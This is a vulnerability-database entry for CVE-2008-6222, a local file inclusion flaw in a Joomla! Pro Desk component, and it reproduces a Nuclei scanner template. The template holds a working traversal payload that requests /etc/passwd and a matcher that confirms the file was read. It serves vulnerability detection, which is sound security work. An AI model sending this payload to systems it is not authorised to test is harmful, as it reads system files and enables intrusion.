Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2008-6222
HistorySep 27, 2021 - 11:02 a.m.

Joomla! ProDesk 1.0/1.2 - Local File Inclusion

2021-09-2711:02:48
ProjectDiscovery
github.com
2

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

6.6 Medium

AI Score

Confidence

Low

0.013 Low

EPSS

Percentile

85.9%

Joomla! Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 allows remote attackers to read arbitrary files via a … (dot dot) in the include_file parameter to index.php.

id: CVE-2008-6222

info:
  name: Joomla! ProDesk 1.0/1.2 - Local File Inclusion
  author: daffainfo
  severity: medium
  description: Joomla! Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.
  remediation: |
    Apply the latest security patches or upgrade to a patched version of Joomla! ProDesk to mitigate the vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/6980
    - https://nvd.nist.gov/vuln/detail/CVE-2008-6222
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/46356
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2008-6222
    cwe-id: CWE-22
    epss-score: 0.01302
    epss-percentile: 0.85861
    cpe: cpe:2.3:a:joomlashowroom:pro_desk_support_center:1.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: joomlashowroom
    product: pro_desk_support_center
  tags: cve,cve2008,joomla,lfi,edb,joomlashowroom

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210085ba6f15c447dffc76deb881a79fa4f92f8beb9255635e3a753f2cffcfc1dbbd022100d607c5f2aeba0c92069b3518cab335995771aa173ec4a1ed40c49cec8b43ec58:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

6.6 Medium

AI Score

Confidence

Low

0.013 Low

EPSS

Percentile

85.9%

Related for NUCLEI:CVE-2008-6222